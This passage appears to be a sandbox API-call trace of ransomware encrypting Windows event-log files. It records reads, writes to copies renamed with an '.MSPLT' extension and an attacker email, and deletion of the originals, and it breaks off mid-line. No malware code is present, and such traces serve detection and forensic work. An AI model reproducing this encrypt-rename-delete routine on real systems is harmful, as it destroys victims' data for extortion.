[0294.293] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.293] lstrlenW (lpString=".doc") returned 4 [0294.294] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString=".docx") returned 5 [0294.294] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.294] lstrlenW (lpString=".pdf") returned 4 [0294.294] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString=".xls") returned 4 [0294.294] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString=".xlsx") returned 5 [0294.294] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.294] lstrlenW (lpString=".ppt") returned 4 [0294.294] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.294] lstrlenW (lpString=".zip") returned 4 [0294.294] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString=".rar") returned 4 [0294.294] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString=".bz2") returned 4 [0294.294] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString=".7z") returned 3 [0294.294] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.294] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.294] lstrlenW (lpString=".dbf") returned 4 [0294.294] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.294] lstrlenW (lpString=".1cd") returned 4 [0294.294] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.294] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.294] lstrlenW (lpString=".jpg") returned 4 [0294.295] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.295] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.295] lstrlenW (lpString="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 49 [0294.295] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.295] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0294.296] CloseHandle (hObject=0x37c) returned 1 [0294.296] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 0x20 [0294.296] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.296] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.296] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.296] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.296] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0294.302] GetLastError () returned 0x0 [0294.302] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.545] WriteFile (in: hFile=0x478, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.548] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.548] WriteFile (in: hFile=0x478, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x136, lpOverlapped=0x0) returned 1 [0294.548] SetEndOfFile (hFile=0x478) returned 1 [0294.553] CloseHandle (hObject=0x478) returned 1 [0294.556] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.556] SetEndOfFile (hFile=0x37c) returned 1 [0294.558] CloseHandle (hObject=0x37c) returned 1 [0294.558] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.559] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx")) returned 1 [0294.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.559] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.559] lstrlenW (lpString=".doc") returned 4 [0294.559] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.559] lstrlenW (lpString=".docx") returned 5 [0294.559] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.559] lstrlenW (lpString=".pdf") returned 4 [0294.559] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.559] lstrlenW (lpString=".xls") returned 4 [0294.559] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.559] lstrlenW (lpString=".xlsx") returned 5 [0294.559] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.559] lstrlenW (lpString=".ppt") returned 4 [0294.559] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.560] lstrlenW (lpString=".zip") returned 4 [0294.560] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString=".rar") returned 4 [0294.560] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString=".bz2") returned 4 [0294.560] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString=".7z") returned 3 [0294.560] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.560] lstrlenW (lpString=".dbf") returned 4 [0294.560] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.560] lstrlenW (lpString=".1cd") returned 4 [0294.560] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.560] lstrlenW (lpString=".jpg") returned 4 [0294.560] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.560] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.560] lstrlenW (lpString=".doc") returned 4 [0294.560] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.560] lstrlenW (lpString=".docx") returned 5 [0294.561] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.561] lstrlenW (lpString=".pdf") returned 4 [0294.561] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString=".xls") returned 4 [0294.561] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString=".xlsx") returned 5 [0294.561] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.561] lstrlenW (lpString=".ppt") returned 4 [0294.561] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.561] lstrlenW (lpString=".zip") returned 4 [0294.561] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString=".rar") returned 4 [0294.561] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString=".bz2") returned 4 [0294.561] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString=".7z") returned 3 [0294.561] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.561] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.561] lstrlenW (lpString=".dbf") returned 4 [0294.561] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.561] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.561] lstrlenW (lpString=".1cd") returned 4 [0294.561] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.562] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 57 [0294.562] lstrlenW (lpString=".jpg") returned 4 [0294.562] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.562] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0294.562] lstrlenW (lpString="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 76 [0294.562] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0294.584] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0294.584] CloseHandle (hObject=0x480) returned 1 [0294.584] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 0x20 [0294.584] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.585] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0294.585] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.585] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.585] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0294.585] GetLastError () returned 0x0 [0294.586] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.591] WriteFile (in: hFile=0x468, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.593] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.594] WriteFile (in: hFile=0x468, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x16c, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x16c, lpOverlapped=0x0) returned 1 [0294.594] SetEndOfFile (hFile=0x468) returned 1 [0294.594] CloseHandle (hObject=0x468) returned 1 [0294.600] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.600] SetEndOfFile (hFile=0x480) returned 1 [0295.112] CloseHandle (hObject=0x480) returned 1 [0295.113] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.113] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx")) returned 1 [0295.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.114] lstrlenW (lpString=".doc") returned 4 [0295.114] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString=".docx") returned 5 [0295.114] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.114] lstrlenW (lpString=".pdf") returned 4 [0295.114] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString=".xls") returned 4 [0295.114] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString=".xlsx") returned 5 [0295.114] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.114] lstrlenW (lpString=".ppt") returned 4 [0295.114] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.114] lstrlenW (lpString=".zip") returned 4 [0295.114] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString=".rar") returned 4 [0295.114] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString=".bz2") returned 4 [0295.114] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString=".7z") returned 3 [0295.114] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.114] lstrlenW (lpString=".dbf") returned 4 [0295.114] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.114] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.115] lstrlenW (lpString=".1cd") returned 4 [0295.115] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.115] lstrlenW (lpString=".jpg") returned 4 [0295.115] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.115] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.115] lstrlenW (lpString=".doc") returned 4 [0295.115] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString=".docx") returned 5 [0295.115] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.115] lstrlenW (lpString=".pdf") returned 4 [0295.115] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString=".xls") returned 4 [0295.115] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString=".xlsx") returned 5 [0295.115] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.115] lstrlenW (lpString=".ppt") returned 4 [0295.115] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.115] lstrlenW (lpString=".zip") returned 4 [0295.115] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString=".rar") returned 4 [0295.115] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString=".bz2") returned 4 [0295.115] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.115] lstrlenW (lpString=".7z") returned 3 [0295.115] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.115] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.115] lstrlenW (lpString=".dbf") returned 4 [0295.116] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.116] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.116] lstrlenW (lpString=".1cd") returned 4 [0295.116] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.116] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 84 [0295.116] lstrlenW (lpString=".jpg") returned 4 [0295.116] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.116] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0295.116] lstrlenW (lpString="Microsoft-Windows-Windows Defender%4WHC.evtx") returned 44 [0295.116] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.116] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0295.116] CloseHandle (hObject=0x480) returned 1 [0295.116] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 0x20 [0295.116] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0295.117] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0295.117] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.117] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.117] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0295.118] GetLastError () returned 0x0 [0295.118] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0295.225] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0295.229] ReadFile (in: hFile=0x480, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0295.229] WriteFile (in: hFile=0x470, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x12c, lpOverlapped=0x0) returned 1 [0295.229] SetEndOfFile (hFile=0x470) returned 1 [0295.256] CloseHandle (hObject=0x470) returned 1 [0295.261] SetFilePointerEx (in: hFile=0x480, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0295.261] SetEndOfFile (hFile=0x480) returned 1 [0295.262] CloseHandle (hObject=0x480) returned 1 [0295.262] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0295.263] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx")) returned 1 [0295.263] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.263] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.263] lstrlenW (lpString=".doc") returned 4 [0295.263] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.263] lstrlenW (lpString=".docx") returned 5 [0295.264] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.264] lstrlenW (lpString=".pdf") returned 4 [0295.264] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString=".xls") returned 4 [0295.264] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString=".xlsx") returned 5 [0295.264] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.264] lstrlenW (lpString=".ppt") returned 4 [0295.264] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.264] lstrlenW (lpString=".zip") returned 4 [0295.264] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString=".rar") returned 4 [0295.264] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString=".bz2") returned 4 [0295.264] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString=".7z") returned 3 [0295.264] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.264] lstrlenW (lpString=".dbf") returned 4 [0295.264] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.264] lstrlenW (lpString=".1cd") returned 4 [0295.264] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0295.264] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.264] lstrlenW (lpString=".jpg") returned 4 [0295.264] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.265] lstrlenW (lpString=".doc") returned 4 [0295.265] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString=".docx") returned 5 [0295.265] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0295.265] lstrlenW (lpString=".pdf") returned 4 [0295.265] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString=".xls") returned 4 [0295.265] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString=".xlsx") returned 5 [0295.265] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0295.265] lstrlenW (lpString=".ppt") returned 4 [0295.265] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned 52 [0295.265] lstrlenW (lpString=".zip") returned 4 [0295.265] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString=".rar") returned 4 [0295.265] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString=".bz2") returned 4 [0295.265] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0295.265] lstrlenW (lpString=".7z") returned 3 [0295.265] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0295.265] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows 